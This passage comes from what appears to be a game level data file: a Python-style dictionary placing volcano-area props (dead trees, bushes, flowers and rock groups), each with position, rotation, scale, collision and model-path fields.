'models/props/pir_m_prp_vol_treeDead_c'}},'1273511398.52akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-249.059, 58.677, 65.176),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511402.3akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-170.017, 0.0, 0.0),'Pos': Point3(-549.097, 97.096, 73.37),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511406.09akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(124.472, 0.0, 0.0),'Pos': Point3(-591.184, 210.272, 66.446),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511407.95akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-624.781, 180.905, 65.95),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_a'}},'1273511411.66akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-75.755, 0.0, 0.0),'Pos': Point3(-326.683, 216.392, 61.061),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_a'}},'1273511413.02akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-260.402, 159.359, 65.741),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_d'}},'1273511417.69akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(3.51, -76.858, 91.226),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511420.97akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(237.674, -55.371, 28.356),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511426.34akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(72.264, 0.0, 0.0),'Pos': Point3(-318.021, 392.071, 46.568),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511428.14akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-230.468, 480.694, 47.454),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_a'}},'1273511429.44akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-272.579, 397.308, 48.094),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_d'}},'1273511435.56akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-157.361, 0.0, 0.0),'Pos': Point3(-384.429, 385.792, 44.531),'Scale': VBase3(0.721, 0.721, 0.721),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_a'}},'1273511440.19akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-519.813, 442.984, 38.58),'Scale': VBase3(0.738, 0.738, 0.738),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511444.73akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(95.585, 600.209, 16.561),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_a'}},'1273511447.59akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-179.378, 0.0, 0.0),'Pos': Point3(291.432, 642.696, 23.133),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273511541.06akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(138.868, 0.976, 4.412),'Objects': {'1273620739.14akelts': {'Type': 'Volcano','DisableCollision': False,'GridPos': Point3(-222.495, 139.547, 64.744),'Holiday': '','Hpr': VBase3(-138.991, 3.635, 2.686),'Pos': Point3(-6.176, -1.234, -0.009),'Scale': VBase3(0.193, 0.193, 0.193),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}}},'Pos': Point3(-275.643, 169.902, 60.405),'RenderEffect': False,'Scale': VBase3(9.742, 9.742, 9.742),'VisSize': '','Visual': {'Color': (0.369, 0.416, 0.486, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_j'}},'1273511573.75akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-174.119, 3.894, 2.294),'Pos': Point3(-288.086, 42.861, 52.107),'RenderEffect': False,'Scale': VBase3(2.674, 2.674, 2.674),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1273511617.47akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-129.995, 4.392, -1.061),'Pos': Point3(-338.767, 30.541, 63.027),'RenderEffect': False,'Scale': VBase3(5.842, 5.842, 5.842),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_h'}},'1273513052.0akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(204.852, -67.799, 39.53),'Scale': VBase3(2.113, 2.113, 2.113),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273513061.67akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(208.173, -57.653, 37.782),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273513065.72akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(199.347, -94.335, 42.245),'Scale': VBase3(1.648, 1.648, 1.648),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273513068.89akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(236.614, -125.458, 38.97),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273513073.16akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(277.911, -123.549, 31.843),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273513075.61akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(242.661, -57.771, 27.195),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273513080.05akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(256.46, -42.096, 20.764),'Scale': VBase3(1.961, 1.961, 1.961),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273513161.17akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(149.737, 2.946, -5.903),'Pos': Point3(242.828, -130.646, 37.256),'RenderEffect': False,'Scale': VBase3(2.622, 2.622, 2.622),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_i'}},'1273513778.33akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(251.915, -122.755, 35.992),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273513803.31akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(43.789, 16.73, 18.441),'Pos': Point3(232.908, -48.767, 30.419),'RenderEffect': False,'Scale': VBase3(2.622, 2.622, 2.622),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_j'}},'1273617351.03akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1273618307.91akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(55.008, -7.754, 0.267),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618319.39akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-470.558, 214.474, 68.916),'Holiday': '','Hpr': VBase3(32.73, 0.0, 0.0),'Pos': Point3(11.147, -4.92, 3.684),'Scale': VBase3(1.613, 1.613, 1.613),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}}},'Pos': Point3(-481.705, 219.394, 65.232),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_flat'}},'1273617465.25akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-68.421, 4.01, -12.814),'Pos': Point3(-212.56, 36.499, 75.17),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_flat'}},'1273617575.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(104.108, 2.527, -29.301),'Pos': Point3(-791.795, 60.372, 10.262),'RenderEffect': False,'Scale': VBase3(1.24, 1.24, 1.24),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_flat'}},'1273617786.13akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.0, 29.307, 0.0),'Pos': Point3(-814.066, 117.103, 27.965),'RenderEffect': False,'Scale': VBase3(1.229, 1.229, 1.229),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_g'}},'1273618116.92akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(61.255, -4.938, 9.959),'Pos': Point3(329.372, -119.853, 20.158),'RenderEffect': False,'Scale': VBase3(4.179, 4.179, 4.179),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_l'}},'1273618142.88akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(301.517, -113.656, 23.539),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618148.25akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(391.527, -82.915, 14.089),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618152.58akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(430.246, -97.02, 13.697),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618160.56akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(163.411, -167.406, 52.9),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_c'}},'1273618161.94akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(179.079, -191.369, 55.86),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_c'}},'1273618162.89akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(180.599, -185.884, 54.821),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618166.17akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(179.257, -95.658, 45.624),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618168.47akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(93.916, -118.768, 61.692),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618170.27akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(67.107, -121.587, 74.129),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273618172.11akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(21.069, -161.323, 90.783),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618174.14akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-11.657, -113.657, 92.671),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_c'}},'1273618184.98akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-71.661, -140.067, 98.219),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_a'}},'1273618189.66akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-125.457, -131.031, 104.443),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618196.23akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-76.589, -199.071, 109.79),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618197.2akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-76.114, -192.975, 109.369),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_b'}},'1273618204.44akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-139.775, -273.067, 108.228),'Scale': VBase3(1.651, 1.651, 1.651),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618210.45akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-241.971, -287.025, 115.344),'Scale': VBase3(0.876, 0.876, 0.876),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_c'}},'1273618216.23akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-270.782, -272.781, 117.825),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618220.91akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-359.19, -226.785, 113.594),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618225.2akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-364.677, -329.996, 119.873),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618227.19akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-124.379, 0.0, 0.0),'Pos': Point3(-315.138, -334.297, 127.726),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618231.33akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-337.154, -163.298, 106.66),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_a'}},'1273618234.95akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-198.133, -135.398, 106.504),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273618242.08akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-98.066, 0.0, 0.0),'Pos': Point3(-178.186, -70.115, 107.825),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_c'}},'1273618244.13akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-157.994, -23.45, 104.68),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618251.0akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-222.912, 18.578, 79.072),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618255.25akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-262.118, 54.123, 64.293),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618257.72akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-220.824, 136.707, 64.898),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273618260.41akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-299.883, 203.213, 62.246),'Scale': VBase3(1.406, 1.406, 1.406),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618266.59akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-137.365, 0.0, 0.0),'Pos': Point3(-465.91, 46.349, 73.462),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618268.58akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-443.778, -2.166, 73.013),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618269.8akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-487.157, 63.553, 73.984),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618272.11akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-446.923, 89.485, 70.813),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618274.47akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-418.059, 52.258, 71.805),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618275.38akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-406.676, 34.317, 72.623),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618280.56akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-362.959, 30.092, 69.098),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_c'}},'1273618282.16akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-348.783, 52.996, 66.092),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273618285.48akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-461.88, -18.053, 72.019),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618287.94akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-510.723, 33.704, 76.281),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618292.2akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-535.67, 94.955, 73.444),'Scale': VBase3(1.243, 1.243, 1.243),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618295.22akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-602.515, 92.605, 71.666),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618296.3akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-657.339, 61.309, 66.221),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618297.13akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-663.053, 64.069, 66.56),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_b'}},'1273618300.47akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-676.998, 169.085, 57.762),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618302.67akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-29.887, 7.421, 0.0),'Pos': Point3(-666.55, 184.103, 61.385),'Scale': VBase3(2.944, 2.944, 2.944),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618303.83akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-641.321, 202.811, 65.905),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618305.7akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-552.123, 198.699, 67.267),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618307.13akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-513.909, 202.059, 66.968),'Scale': VBase3(1.256, 1.256, 1.256),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_b'}},'1273618327.0akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(0.0, 0.0, 4.488),'Pos': Point3(-523.347, 326.533, 57.327),'Scale': VBase3(1.48, 1.48, 1.48),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_c'}},'1273618327.88akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-543.492, 324.867, 59.232),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273618331.58akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(116.809, 0.0, 0.0),'Pos': Point3(-561.178, 386.724, 49.208),'Scale': VBase3(2.064, 2.064, 2.064),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618334.78akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-520.351, 446.496, 36.537),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_b'}},'1273618337.86akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-497.715, 459.779, 38.215),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618340.31akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-477.735, 354.954, 52.101),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618341.11akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(58.95, 0.0, 6.204),'Pos': Point3(-443.822, 